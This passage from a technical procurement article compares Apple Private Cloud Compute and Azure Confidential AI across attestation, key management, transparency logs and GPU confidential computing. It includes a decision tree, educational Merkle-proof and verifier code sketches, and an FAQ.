&lt;p&gt;No major-cloud verifier ships a public append-only log of its own code. MAA does not; Google Cloud Attestation does not; AWS Nitro&apos;s hypervisor signer does not. The Intel Trust Authority integration on GCP introduces a &lt;em&gt;second&lt;/em&gt; verifier, which is a partial cross-check, but a second verifier is not the same architectural primitive as a transparency log [@ita-gcp]. Where the work is happening: the CCC Attestation Special Interest Group on GitHub coordinates Formal Specifications of Attestation Mechanisms, an RA-TLS proof of concept, an interoperable RA-TLS effort, an IETF RATS terms cheat sheet, and a formal-spec-KBS (key broker service) project [@ccc-attestation-gh]. The IETF RATS Working Group continues to extend RFC 9334 with Entity Attestation Token (EAT) and Concise Reference Integrity Manifest (CoRIM) drafts [@ietf-rfc9334].&lt;/p&gt;
&lt;h3&gt;9.2 GPU confidential-computing parity across vendors&lt;/h3&gt;
&lt;p&gt;NVIDIA H100 CC-On is the only confidential-GPU mode at GA on a major commercial cloud as of mid-2026 [@nvidia-dev-blog] [@ms-sku-nccads]. AMD MI300X ships as compute across multiple clouds but has no production-equivalent SEV-TIO confidential-GPU mode at GA on a major commercial cloud. PCIe TDISP and SEV-TIO Linux support is landing in 2025-2026 kernels, but the GA gap is the load-bearing fact for any procurement that wants AMD silicon end-to-end. AMD&apos;s MI400X-class roadmap is forward-looking. Until a second confidential GPU is at GA, single-vendor lock-in at the accelerator tier is the unavoidable procurement reality for any cloud confidential-AI workload.&lt;/p&gt;
&lt;h3&gt;9.3 Cross-vendor attestation portability&lt;/h3&gt;
&lt;p&gt;IETF RFC 9334 standardises the vocabulary [@ietf-rfc9334]; CoRIM and EAT, in active drafting in the IETF RATS WG, aim at portable claim formats. The vocabulary work matters because a confidential workload that wants to run unchanged on Azure SEV-SNP and Azure TDX and GCP TDX needs a single attestation parser that understands all three evidence formats. The MAA approach maps onto RFC 9334&apos;s Passport pattern; the GCA approach maps onto OIDC tokens that play well with federated-identity tooling. As of mid-2026 no single relying-party library handles all three production verifiers transparently, and that is one of the things the CCC Attestation SIG is working on [@ccc-attestation-gh].&lt;/p&gt;
&lt;h3&gt;9.4 Confidential inferencing for Azure OpenAI models&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s &lt;code&gt;Azure-Samples/confidential-ai-workshop&lt;/code&gt; repository [@ms-workshop] is the cleanest procurement-grade reference for what confidential inferencing actually looks like in production on Azure today. It contains three end-to-end tutorials at three different points on the cost-versus-isolation curve, and reading them in sequence is the fastest way for a procurement team to map the abstract architecture to concrete SKU lines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tutorial 1: ML-training on a CPU-only confidential VM (&lt;code&gt;Standard_DCasv5&lt;/code&gt;).&lt;/strong&gt; The &lt;code&gt;confidential-ml-training&lt;/code&gt; directory walks training of an XGBoost-class classical-ML model on a &lt;code&gt;Standard_DCasv5&lt;/code&gt; SKU, which is an AMD SEV-SNP confidential VM &lt;em&gt;without&lt;/em&gt; a confidential GPU [@ms-workshop-ml]. The workload posture is plaintext-data-and-model on a TEE-protected substrate, with the SEV-SNP attestation gating access to encrypted training data in Azure Storage via the standard MAA + SKR path. The deliberate choice of XGBoost over a deep-learning model is the architectural lesson: when the model and training data fit in CPU memory and TCB-sealed CPU compute is sufficient, the confidential GPU SKU is overkill. This is the lowest-cost on-ramp into the architecture.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tutorial 2: LLM inferencing on a confidential GPU (&lt;code&gt;Standard_NCC40ads_H100_v5&lt;/code&gt;).&lt;/strong&gt; The &lt;code&gt;confidential-llm-inferencing&lt;/code&gt; directory walks serving &lt;code&gt;microsoft/Phi-4-mini-reasoning&lt;/code&gt; on a &lt;code&gt;Standard_NCC40ads_H100_v5&lt;/code&gt; SKU [@ms-workshop-llm]. Phi-4-mini-reasoning is a 3.8 B-parameter dense decoder-only Transformer with a 128 K-token context window, MIT-licensed on Hugging Face [@hf-phi4-mini], chosen because it fits comfortably in the H100 NVL&apos;s 94 GB HBM3 capacity with room for activation memory. The novel architectural feature here is &lt;strong&gt;double attestation&lt;/strong&gt;: the tutorial&apos;s setup script uses &lt;code&gt;Azure/az-cgpu-onboarding&lt;/code&gt; [@az-cgpu-onboarding] to verify both the SEV-SNP CVM attestation (against AMD VCEK) &lt;em&gt;and&lt;/em&gt; the NVIDIA H100 GPU attestation (against NVIDIA&apos;s on-die root of trust via NRAS) before model weights are released from Azure Key Vault Premium via SKR. This is the architectural pattern any production GPU-confidential workload should match.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tutorial 3: Inferencing via the Confidential Whisper service (OHTTP + HPKE).&lt;/strong&gt; Whisper, the speech-to-text model, is the publicly-demoed Microsoft Build 2024 confidential inferencing reference workload. The &lt;code&gt;confidential-whisper-inferencing&lt;/code&gt; tutorial directory confirms the Azure AI Foundry Confidential Whisper service uses &lt;strong&gt;Oblivious HTTP&lt;/strong&gt; with &lt;strong&gt;HPKE&lt;/strong&gt; end-to-end encryption to keep audio encrypted until it reaches the TEE-protected Whisper model [@ms-workshop-whisper]. The reference OHTTP gateway implementation is &lt;code&gt;microsoft/attested-ohttp-client&lt;/code&gt; and its server-side counterpart, &quot;an Attested OHTTP gateway and client implementation by Microsoft&quot; that &quot;uses the Cloudflare OHTTP client/server implementation as a basis&quot; [@ms-attested-ohttp]. This is the closest architectural pattern Azure has to PCC&apos;s non-targetability requirement -- a third-party-operated OHTTP relay strips the client IP before the request reaches the confidential inferencing endpoint, the same architectural primitive Apple uses for PCC at network ingress.&lt;/p&gt;
&lt;p&gt;The three tutorials are the canonical references because they walk the wire-level flow. A procurement team that wants to know &quot;what does confidential inferencing actually look like on Azure&quot; can read the README files, the Bicep templates, the attestation-policy JSON, and the SKR-policy JSON, and answer the question without speculation. GPT-class confidential endpoints staging through 2024-2026 are forward-looking roadmap. There is no May-2024 GA for &quot;Confidential GPT-4,&quot; but the three workshop tutorials cover the architectural primitives that such a GA would compose.&lt;/p&gt;
&lt;h3&gt;9.5 The Apple PCC node-chip transition&lt;/h3&gt;
&lt;p&gt;Apple has not publicly named the chip family used in PCC nodes. Firmware identifiers and independent analyses make the transition story concrete enough to reason about. At launch in June 2024 the PCC nodes ran on M2-Ultra-class silicon, identified by the firmware string &lt;code&gt;ComputeModule14,1&lt;/code&gt; visible in independent device-identifier databases [@appledb-cm14]. During 2026 the PCC fleet transitioned to a new node generation identified as &lt;code&gt;J226C&lt;/code&gt; and reported (independently, not by Apple) as built around M5-class silicon manufactured in Houston, Texas [@nine-to-five-mac-m5] [@winbuzzer-m5]. The 9to5Mac report dated February 17, 2026 describes Apple&apos;s M5-based Private Cloud Compute servers tied to iOS 26.4 [@nine-to-five-mac-m5], and the parallel Winbuzzer coverage from the next day confirms a new &quot;Private Cloud Compute Agent Worker&quot; component running on M5-class node hardware [@winbuzzer-m5].&lt;/p&gt;
&lt;p&gt;What is architecturally interesting is not the chip identity. It is what the transition &lt;em&gt;did not&lt;/em&gt; change. The Transparency Log architecture absorbs a generational chip change as a matter of routine policy because the log&apos;s verifier policy is a list of approved image hashes and the SEP-rooted attestation envelope structure, not a list of approved chip families. New node generation, new image hashes (visible in &lt;code&gt;PrivateCloudCompute/Release.swift&lt;/code&gt; and validated by &lt;code&gt;PrivateCloudCompute/NodeValidator.swift&lt;/code&gt; [@apple-pcc-nodevalidator] [@apple-pcc-release-swift]), same envelope structure, same client-side verification. From a procurement-trust perspective, the transition was an architectural non-event in exactly the way Apple&apos;s public commitments said it should be.&lt;/p&gt;

**Two invariants held across the M2-Ultra to M5 node transition.** First, the device-side envelope check is stable: the `NodeValidator` validates SEP-signed attestation against the `SEPAttestationPolicy` it parses from the release artefact [@apple-pcc-nodevalidator] [@apple-pcc-sepattestpolicy], and the policy schema did not change. Second, the public transparency log absorbed the transition without any client-side trust ceremony because the chip family is not in the verifier policy -- only the image hash is. A device that started talking to the M2-Ultra fleet in 2024 and woke up in 2026 talking to the M5 fleet did exactly one new thing: it fetched the new approved image hashes from the log. **Three things did change.** First, the on-node software stack (firmware, kernel, OS, inference runtime) is rebuilt for the new silicon; that is why the image hashes change. Second, the routing policy may shift -- some workloads may schedule onto the new node generation preferentially. Third, the chip family itself is not publicly named by Apple; the M5 identification is inferential from independent reporting plus firmware identifiers, not from a primary Apple source. Procurement narratives should use &quot;Apple-designed silicon, not publicly named&quot; when precision matters, and reach for the inferential M5 identification only when chip-family granularity is load-bearing.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The architectural payoff of a public transparency log is precisely that it absorbs a generational chip transition without any client-side trust ceremony, because the chip family is not in the verifier policy -- only the image hash is. This is what &quot;verifiable transparency&quot; buys procurement teams in practice: the trust contract survives silicon turnover because the contract was never about silicon. It was about which bits the silicon ran.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.6 Third-party PCC equivalents&lt;/h3&gt;
&lt;p&gt;Could AWS or Google replicate Apple&apos;s Transparency-Log model on commodity multi-vendor silicon? The architectural feasibility is open. The Kocaoğullar et al. framework provides a conceptual pathway [@kocaogullar-transparency]. The CCC Attestation SIG&apos;s interoperable-ra-tls work is one of several substrates that a multi-vendor transparency log could ride on top of [@ccc-attestation-gh]. Whether any major cloud will actually ship it is the architectural bet the next generation hinges on. No GA product as of mid-2026.&lt;/p&gt;

A regulated workload that needs second-source availability has to be able to run on at least two confidential substrates. As of mid-2026 the practical cross-vendor option for a TEE-based confidential workload is &quot;AMD SEV-SNP on Azure, Intel TDX on GCP, AWS Nitro on AWS&quot; -- three different attestation evidence formats consumed by three different verifiers. CoRIM and EAT in the IETF RATS WG are trying to make those three formats parseable by one library. Until that lands, second-source confidential AI is an integration project, not a configuration change.
&lt;p&gt;The field is wide open. But the reader&apos;s procurement deadline is not. How do you actually choose between PCC and Azure today?&lt;/p&gt;
&lt;h2&gt;10. A Procurement Decision Tree&lt;/h2&gt;
&lt;p&gt;Six questions, asked in order. The first determines whether PCC is even in play; the rest sharpen the choice.&lt;/p&gt;
&lt;h3&gt;Question 1: Do you control the device that originates the request, and is it Apple-Intelligence-capable?&lt;/h3&gt;
&lt;p&gt;PCC requires Apple-Intelligence-capable client devices. The supported set as of mid-2026 is iPhone 15 Pro and later, iPads on M1 silicon or later, and Macs on M1 silicon or later [@apple-pcc-blog]. If your end users are on Windows laptops, Android phones, browsers, or any non-Apple endpoint, PCC is out of scope by construction. Azure / GCP / AWS confidential AI workloads do not have an analogous client-side requirement -- they are workload-shape-agnostic and the client can be any HTTPS-speaking device.&lt;/p&gt;
&lt;h3&gt;Question 2: Can you accept Apple-as-signer as the trust root?&lt;/h3&gt;
&lt;p&gt;PCC&apos;s trust collapses to Apple&apos;s signing infrastructure. The SEP-bound CA, the Apple-operated Transparency Log signer, the Apple bug-bounty program, and the Apple Security Engineering and Architecture team are the entire trust root [@apple-pcc-blog]. Azure spreads trust across AMD plus Intel plus NVIDIA plus Microsoft as separate signers [@ms-maa-overview] [@amd-kds] [@nvidia-dev-blog]. If your security posture explicitly requires multi-vendor trust diffusion -- for example, because your regulator does not accept single-vendor SBOMs as evidence -- Azure wins this axis (see §6 for the architectural reasoning).&lt;/p&gt;
&lt;h3&gt;Question 3: Do you need customer-managed key material?&lt;/h3&gt;
&lt;p&gt;Azure: yes, via SKR from Azure Key Vault Premium or Azure Managed HSM, with a release policy bound to MAA-issued claims [@ms-cc-overview] [@ms-maa-overview]. Apple: no by design, because PCC nodes are stateless and there is no customer key material on the node to be released [@apple-pcc-blog]. Regulated buyers whose framework requires customer-held keys -- for example, a FIPS 140-3 Level 3 customer-key-escrow requirement -- cannot map PCC into that framework, because PCC does not have the architectural primitive the framework is asking for.&lt;/p&gt;
&lt;h3&gt;Question 4: Do you need verifiable transparency of the actually-running code?&lt;/h3&gt;
&lt;p&gt;Apple: yes, via the published Transparency Log [@apple-pcc-release-transparency]. Azure: not via the architecture itself. You can build a customer-side log of the MAA tokens you have observed, or you can accept MAA&apos;s claims at face value. There is no Azure architectural primitive that proves the bits MAA verified are the same bits the workload is actually executing today, in the way that PCC&apos;s Transparency Log proves the image hash served to &lt;em&gt;you&lt;/em&gt; is the same one served to every other PCC user.&lt;/p&gt;
&lt;p&gt;This is the one axis where the architectures differ in &lt;em&gt;kind&lt;/em&gt;. If your threat model requires that &lt;em&gt;you&lt;/em&gt; be able to confirm what code the cloud is running, not just that &lt;em&gt;the cloud&lt;/em&gt; says it is running specific code, PCC is the only production answer.&lt;/p&gt;
&lt;h3&gt;Question 5: Do you need GPU-class confidential compute?&lt;/h3&gt;
&lt;p&gt;Both ship it. Pay attention to two facts. First, Azure&apos;s confidential GPU is H100 only at GA in mid-2026 [@nvidia-dev-blog] [@ms-sku-nccads]. AMD MI300X CC-On is not at GA on a major commercial cloud; NVIDIA H200 and Blackwell-class GB200 GPUs are GA on Azure as non-confidential SKUs. If you need confidential GPU compute, the only major-cloud answer is &lt;code&gt;NCCads_H100_v5&lt;/code&gt; (or its successor). Second, Apple&apos;s GPU is integrated on the SoC and is inside the SEP-rooted attestation envelope by construction; there is no separate cross-vendor GPU attestation step, which simplifies the trust analysis at the cost of being available only on the Apple stack.&lt;/p&gt;
&lt;h3&gt;Question 6: What does your auditor accept as evidence?&lt;/h3&gt;
&lt;p&gt;The MAA JWT is consumable by every off-the-shelf JWT verifier. It is also broadly accepted in regulated audits because the JWT format and the &lt;code&gt;x-ms-*&lt;/code&gt; claim names are documented in publicly-fetchable Microsoft Learn pages [@ms-maa-overview], and auditors can map MAA tokens onto NIST SP 800-53 attestation evidence requirements without exotic tooling.&lt;/p&gt;
&lt;p&gt;PCC&apos;s Transparency Log proof is newer. An audit that accepts a Merkle inclusion proof against an Apple-published log root as evidence is uncommon as of mid-2026; most regulated audit programs were designed before such a primitive existed in cloud AI. If your auditor needs PCC evidence, expect to write explainer documentation that translates &quot;your image hash is in append-only public log at Merkle position N with signed root R&quot; into the language your audit framework uses.&lt;/p&gt;
&lt;p&gt;{`
// Sketch of a Certificate-Transparency-style Merkle inclusion proof check.
// The PCC Transparency Log inherits this structural primitive from RFC 6962.
// This is educational -- a production verifier would use a maintained library.&lt;/p&gt;
&lt;p&gt;const sha256Hex = async (data) =&amp;gt; {
  const bytes = typeof data === &apos;string&apos; ? new TextEncoder().encode(data) : data;
  const buf = await crypto.subtle.digest(&apos;SHA-256&apos;, bytes);
  return [...new Uint8Array(buf)].map((b) =&amp;gt; b.toString(16).padStart(2, &apos;0&apos;)).join(&apos;&apos;);
};&lt;/p&gt;
&lt;p&gt;const concat = (a, b) =&amp;gt; {
  const out = new Uint8Array(a.length + b.length);
  out.set(a); out.set(b, a.length);
  return out;
};&lt;/p&gt;
&lt;p&gt;async function verifyInclusion(leafHashHex, leafIndex, treeSize, sibling, root) {
  // sibling is the audit path (array of sibling node hashes, leaf to root)
  let node = Uint8Array.from(leafHashHex.match(/.{2}/g).map(h =&amp;gt; parseInt(h, 16)));
  let idx = leafIndex;
  let size = treeSize;
  for (const s of sibling) {
    const sBytes = Uint8Array.from(s.match(/.{2}/g).map(h =&amp;gt; parseInt(h, 16)));
    // RFC 6962 prefixes internal hashes with 0x01
    const prefixed = (left, right) =&amp;gt; concat(new Uint8Array([0x01]), concat(left, right));
    const combined = (idx % 2 === 0)
      ? prefixed(node, sBytes)
      : prefixed(sBytes, node);
    const h = await sha256Hex(combined);
    node = Uint8Array.from(h.match(/.{2}/g).map(x =&amp;gt; parseInt(x, 16)));
    idx = Math.floor(idx / 2);
    size = Math.floor((size + 1) / 2);
  }
  const computedRoot = [...node].map((b) =&amp;gt; b.toString(16).padStart(2, &apos;0&apos;)).join(&apos;&apos;);
  return computedRoot === root;
}&lt;/p&gt;
&lt;p&gt;// In production: fetch (signed log root, audit path) from the log
// and the leaf hash from the attestation envelope&apos;s image-hash field.
// If verifyInclusion returns true AND the signed root matches what your
// device trusts, the image you are about to talk to is in the public log.
console.log(&apos;Educational sketch only; use a maintained CT library in production.&apos;);
`}&lt;/p&gt;
&lt;h3&gt;The decision tree in one diagram&lt;/h3&gt;

flowchart TD
    Q1{&quot;Apple-Intelligence-capable&lt;br /&gt;client device required?&quot;}
    Q2{&quot;Single-vendor (Apple)&lt;br /&gt;trust root acceptable?&quot;}
    Q3{&quot;Customer-managed key&lt;br /&gt;material required?&quot;}
    Q4{&quot;Need public-log&lt;br /&gt;verifiable transparency?&quot;}
    Q5{&quot;Need GPU TEE&lt;br /&gt;at fleet scale?&quot;}
    Q6{&quot;Auditor accepts&lt;br /&gt;Merkle inclusion proof?&quot;}
    Q1 --&amp;gt;|No| AZ[Azure / GCP / AWS]
    Q1 --&amp;gt;|Yes| Q2
    Q2 --&amp;gt;|No| AZ
    Q2 --&amp;gt;|Yes| Q3
    Q3 --&amp;gt;|Yes| AZ
    Q3 --&amp;gt;|No| Q4
    Q4 --&amp;gt;|Yes| Q5
    Q4 --&amp;gt;|No| AZ
    Q5 --&amp;gt;|Yes, Apple integrated GPU OK| PCC[Apple PCC]
    Q5 --&amp;gt;|Yes, need NVIDIA H100| AZ
    PCC --&amp;gt; Q6
    Q6 --&amp;gt;|Yes| PCC2[PCC fits the audit posture]
    Q6 --&amp;gt;|No| PCC3[Write explainer documentation,&lt;br /&gt;or fall back to Azure JWT-based evidence]

The MAA JWT maps cleanly onto NIST SP 800-53 SA-12 (Supply Chain Protection) and SC-12 (Cryptographic Key Establishment and Management) evidence requirements, because the JWT format and the claim semantics are publicly documented and JWT verifiers are standard library code [@ms-maa-overview]. PCC&apos;s Transparency Log evidence is newer; SA-12-style framings exist for Certificate Transparency in the web-PKI context but not yet (as of mid-2026) as a recognised confidential-AI evidence pattern. Expect explainer documentation to be required. Both architectures interact with FedRAMP, but Azure&apos;s confidential AI offerings are further along the FedRAMP path because Microsoft&apos;s broader Azure compliance suite is older.

Azure is the first cloud provider to offer confidential computing with NVIDIA H100 GPUs. -- NVIDIA Blog, September 24, 2024 [@nvidia-h100-ga]
&lt;h3&gt;What the verifier actually does, on the wire&lt;/h3&gt;
&lt;p&gt;Once procurement has chosen the architecture, an engineer somewhere has to &lt;em&gt;write the verifier&lt;/em&gt;. The two architectures end up being symmetric in this regard: each produces a cryptographic envelope, and a relying party has to parse, validate signatures, and check inclusion or claims. Three procurement-grade reference primitives anchor the choice -- two from Azure (already shown above), one from Apple PCC.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;On Azure&lt;/strong&gt;, the relying party walks an MAA JWT verification flow (decode the JWT, validate signature against the MAA JWKS, match claims against an SKR release policy -- the JavaScript reference appears in §6 Axis 3 alongside the MAA JWT decode) [@ms-maa-overview]. For customers who want to &lt;em&gt;not&lt;/em&gt; trust MAA, the alternative path uses &lt;code&gt;snpguest&lt;/code&gt; to fetch the AMD VCEK chain and verify the SEV-SNP attestation directly (the bash reference also in §6 Axis 3) [@virtee-snpguest]. The two paths produce structurally equivalent confidence in the same evidence.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;On Apple PCC&lt;/strong&gt;, the relying-party verifier is &lt;code&gt;PrivateCloudCompute/NodeValidator.swift&lt;/code&gt; and friends [@apple-pcc-nodevalidator]. The flow is: parse the &lt;code&gt;AttestationBundle&lt;/code&gt; from the response (the bundle structure is defined in &lt;code&gt;SEPAttestation.swift&lt;/code&gt; [@apple-pcc-sepattest]); call the SEP attestation context verifier (&lt;code&gt;aks_attest_context_verify&lt;/code&gt;) on the SEP signature against the per-die Apple-rooted certificate chain; parse the &lt;code&gt;Release.swift&lt;/code&gt; &lt;code&gt;Release&lt;/code&gt; struct as ASN.1 DER and compute its SHA-256 digest [@apple-pcc-release-swift]; check the SEP attestation policy claims (&lt;code&gt;SEPAttestationPolicy.swift&lt;/code&gt; [@apple-pcc-sepattestpolicy]) constrain the release digest; then call &lt;code&gt;SWTransparencyVerifier.verifyExpiringInclusion&lt;/code&gt; to verify the release digest&apos;s inclusion proof in the public transparency log [@apple-pcc-swtrans-verifier] [@apple-pcc-transparencypolicy]. The full reference is the &lt;code&gt;apple/private-cloud-compute&lt;/code&gt; repository&apos;s &lt;code&gt;VerifiableReleasesExtension&lt;/code&gt; directory and the &lt;code&gt;VerifiableReleasesExtension&lt;/code&gt; tutorial [@apple-pcc-vre].&lt;/p&gt;
&lt;p&gt;{`# This is a procurement-grade SKETCH, not production code. It walks the four&lt;/p&gt;
verification steps a real PCC client performs (see PrivateCloudCompute/
NodeValidator.swift for the canonical reference [@apple-pcc-nodevalidator]).
Each function is a stub showing the contract the caller must satisfy.
&lt;p&gt;from hashlib import sha256
from typing import Optional
from dataclasses import dataclass&lt;/p&gt;
&lt;p&gt;@dataclass
class AttestationBundle:
    &quot;&quot;&quot;The Apple PCC AttestationBundle, parsed from the response envelope.
    Structure defined in SEPAttestation.swift [@apple-pcc-sepattest].&quot;&quot;&quot;
    sep_signature: bytes
    sep_cert_chain: list
    release_der: bytes
    sep_attestation_policy_claims: dict
    transparency_inclusion_proof: dict&lt;/p&gt;
&lt;p&gt;def aks_attest_context_verify(
    sep_signature: bytes,
    sep_cert_chain: list,
    apple_root_anchor: bytes,
) -&amp;gt; bool:
    &quot;&quot;&quot;Step 1: verify the SEP signature against the per-die Apple-rooted
    certificate chain. In the real client this calls the Security framework&apos;s
    aks_attest_context_verify; the SEP cert chain is rooted at Apple&apos;s PCC CA.
    Returns True if the signature chains to the pinned anchor.&quot;&quot;&quot;
    raise NotImplementedError(&quot;calls Security.framework in a real client&quot;)&lt;/p&gt;
&lt;p&gt;def compute_release_digest(release_der: bytes) -&amp;gt; bytes:
    &quot;&quot;&quot;Step 2: the Release struct is serialised as ASN.1 DER; the canonical
    release digest is SHA-256 over the DER bytes. See Release.swift for the
    schema [@apple-pcc-release-swift].&quot;&quot;&quot;
    return sha256(release_der).digest()&lt;/p&gt;
&lt;p&gt;def check_sep_attestation_policy(
    claims: dict,
    expected_release_digest: bytes,
) -&amp;gt; bool:
    &quot;&quot;&quot;Step 3: the SEP attestation policy claims must constrain the release
    digest. See SEPAttestationPolicy.swift for the policy schema
    [@apple-pcc-sepattestpolicy]. A real client checks the policy version,
    the claimed release digest, and the attestation freshness window.&quot;&quot;&quot;
    claimed_digest = claims.get(&quot;release_digest&quot;)
    return claimed_digest == expected_release_digest&lt;/p&gt;
&lt;p&gt;def verify_expiring_inclusion(
    release_digest: bytes,
    inclusion_proof: dict,
    log_witness_root: bytes,
) -&amp;gt; bool:
    &quot;&quot;&quot;Step 4: verify the release digest&apos;s inclusion in the public PCC
    transparency log against a witness-cosigned tree head. Reference impl:
    SWTransparencyVerifier.verifyExpiringInclusion
    [@apple-pcc-swtrans-verifier] [@apple-pcc-transparencypolicy].&quot;&quot;&quot;
    raise NotImplementedError(&quot;merkle proof + cosigned witness check&quot;)&lt;/p&gt;
&lt;p&gt;def verify_pcc_envelope(
    bundle: AttestationBundle,
    apple_root_anchor: bytes,
    log_witness_root: bytes,
) -&amp;gt; bool:
    &quot;&quot;&quot;The four-step PCC verifier flow. Returns True only if every step
    passes. A real client refuses to send the user&apos;s prompt if this returns
    False.&quot;&quot;&quot;
    if not aks_attest_context_verify(
        bundle.sep_signature, bundle.sep_cert_chain, apple_root_anchor
    ):
        return False
    release_digest = compute_release_digest(bundle.release_der)
    if not check_sep_attestation_policy(
        bundle.sep_attestation_policy_claims, release_digest
    ):
        return False
    if not verify_expiring_inclusion(
        release_digest, bundle.transparency_inclusion_proof, log_witness_root
    ):
        return False
    return True
`}&lt;/p&gt;
&lt;p&gt;The symmetry is the procurement point. &lt;strong&gt;Azure&lt;/strong&gt;: validate JWT signature against MAA JWKS, match claims against SKR policy. &lt;strong&gt;Apple PCC&lt;/strong&gt;: validate SEP signature against Apple PCC CA, validate inclusion proof against transparency log witness root. Both are cryptographic; both produce a yes/no decision against a hardware-anchored chain of trust. The architectural difference is what the relying party is allowed to know: with PCC, the relying party knows the exact image hash that ran (because the log says so); with Azure, the relying party knows the workload met an MAA policy (because the JWT says so). The two are not interchangeable evidence, but the verifier code-paths are roughly the same shape.&lt;/p&gt;
&lt;p&gt;The decision tree handles the typical questions. The atypical questions, and the misconceptions, are next.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;


Yes, in both architectures, against the threats the architecture names. Apple PCC&apos;s SEP-rooted attestation envelope plus the Transparency Log refusal to forward to unlogged images defends against a malicious Apple operator passively reading prompts [@apple-pcc-blog]. Azure CC-AI&apos;s SEV-SNP RMP-enforced memory plus MAA-gated SKR defends against a malicious Microsoft operator on the SEV-SNP path [@ms-maa-overview]. Neither closes side-channels on shared silicon [@ccc-technical-analysis]; neither closes compelled-vendor or lawful-access exposure; neither closes prompt-output exfiltration via the model itself. The &quot;the cloud cannot see your prompt&quot; claim is true against the named threat model and not against every conceivable threat.

Yes. The 2018-2020 cascade closed the SGX-era residuals -- Foreshadow / L1TF [@foreshadow], SgxPectre [@sgxpectre], Plundervolt (CVE-2019-11157) [@plundervolt] -- and the principled extension is that any TEE built on shared microarchitectural state inherits a similar surface. The CCC&apos;s &quot;A Technical Analysis of Confidential Computing&quot; v1.3 names this explicitly as a residual risk that the architecture does not close by construction [@ccc-technical-analysis]. CipherLeaks (USENIX Security 2021) demonstrated the same point on the AMD SEV side via a deterministic-ciphertext side channel [@cipherleaks]. Vendor microcode updates are an ongoing operational requirement, not a one-time fix.

No. Per the `apple/security-pcc` README verbatim: &quot;The publication of this code is intended for security research and verification purposes only&quot; [@apple-pcc-github]. The publication&apos;s purpose is research-grade transparency -- so that an independent researcher can inspect what is running, exercise the architecture inside the Virtual Research Environment, and submit findings to the Apple Security Bounty program with rewards up to \$1,000,000 [@apple-pcc-research]. It is not a typical open-source contribution model and the license and intended use are explicitly different. The substantive thing PCC ships is verifiable transparency of the running fleet, not community-driven development.

No. Both Linux and Windows guest OSes are supported on Azure confidential VMs, and the reference confidential-inferencing stack Microsoft publishes is Linux-based. The `microsoft/confidential-ai-workshop` repository contains three Linux-based tutorial directories: `confidential-llm-inferencing`, `confidential-whisper-inferencing`, and `confidential-ml-training`, with reusable modules for attestation, key management, key origin, model sourcing, and OS disk encryption [@ms-workshop]. The LLM inferencing tutorial deploys a `Standard_NCC40ads_H100_v5` confidential VM with a vLLM-plus-Streamlit-plus-Caddy stack [@ms-workshop-llm]. Windows is supported; Linux is the canonical reference.

Confidential Containers is an orchestration-layer abstraction that maps Kubernetes pods onto Generation-3 confidential VMs running on AMD SEV-SNP, Intel TDX, or IBM Secure Execution [@coco-gh]. It composes on top of the same substrate Azure CC-AI uses. It does not compete with Apple PCC architecturally -- they live at different layers of the stack. A CoCo deployment on Azure can use MAA and SKR for its attestation and key-release primitives, and orchestration vendors like Edgeless Systems&apos; Contrast wrap that pattern into a workload-level confidential-computing primitive on Kubernetes [@edgeless-contrast].

No. Both rest on vendor-controlled signing infrastructure. PCC&apos;s compelled-vendor exposure is concentrated on Apple, because the signer of every PCC attestation chain is Apple. Azure&apos;s is distributed across AMD, Intel, NVIDIA, and Microsoft, but a compelled Microsoft is sufficient to compromise an MAA-rooted workload because MAA is the single verifier whose JWT every downstream relying party trusts [@ms-maa-overview]. Trust diffusion across multiple vendors makes the *collapse* harder, but it does not make any one vendor&apos;s compelled-update path architecturally impossible. This is a property of the trust-rooting model, not a flaw of either architecture, and neither closes it by construction.

No. The canonical late-2024 Mark Russinovich confidential-AI session is **Microsoft Ignite 2024 BRK430**, &quot;Inside Azure Innovations with Mark Russinovich,&quot; also published on YouTube as &quot;Confidential AI and Inference -- Inside Azure Innovations.&quot; Russinovich&apos;s &quot;data in use&quot; framing for confidential computing originally appeared in his September 14, 2017 Azure blog &quot;Introducing Azure confidential computing,&quot; not in an academic OSDI venue [@ms-russinovich-2017]. Microsoft Build 2024&apos;s confidential-inferencing session was BRK227, &quot;Inside AI Security with Mark Russinovich,&quot; which announced confidential inferencing for the Azure OpenAI Whisper speech-to-text model -- not for GPT-4, and not under the title &quot;Confidential GPT&quot; [@ms-workshop-whisper].

&lt;h3&gt;What to carry into the next conversation&lt;/h3&gt;
&lt;p&gt;Two architectures. One promise. One axis on which they differ in kind. The end-user pitch -- &quot;the cloud cannot see your prompt&quot; -- is now functionally identical across Apple Private Cloud Compute and Azure Confidential AI, but the architectural machinery underneath ships two genuinely different things. PCC ships &lt;em&gt;verifiable transparency of the production fleet&lt;/em&gt; through an Apple-controlled stack and a public Transparency Log. Azure CC-AI ships &lt;em&gt;multi-vendor trust diffusion plus customer-managed keys&lt;/em&gt; through AMD SEV-SNP plus NVIDIA H100 CC-On plus MAA plus SKR. Each closes a trust-anchor gap the other leaves open. Neither closes the gap the other closes. Neither closes the side-channel, compelled-vendor, or model-output exfiltration gaps -- the CCC&apos;s own v1.3 analysis names these as residual risks for any TEE-based design [@ccc-technical-analysis].&lt;/p&gt;
&lt;p&gt;The next architectural generation -- the one that combines Azure-style multi-vendor TEE composition with Apple-style append-only transparency of production images -- would close the gap both leave open. The Kocaoğullar et al. transparency framework is the conceptual sketch [@kocaogullar-transparency]; the CCC Attestation SIG and the IETF RATS Working Group are where the production work is happening [@ccc-attestation-gh] [@ietf-rfc9334]. No vendor has shipped it.&lt;/p&gt;
&lt;p&gt;For now, the load-bearing decision is the one Question 4 in §10 asks. If your threat model requires that &lt;em&gt;you&lt;/em&gt; be able to confirm what code the cloud is actually running -- and not just that &lt;em&gt;the cloud&lt;/em&gt; says it is running specific code -- PCC is the only production answer in mid-2026. If your threat model is satisfied by multi-vendor trust diffusion and a managed-verifier JWT, Azure CC-AI gives you a richer key-management story and broader silicon optionality. The architectures are not better and worse. They are answers to different questions. The first useful step in any confidential-AI procurement is naming which question you are actually trying to answer.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;apple-pcc-vs-azure-confidential-ai&quot; keyTerms={[
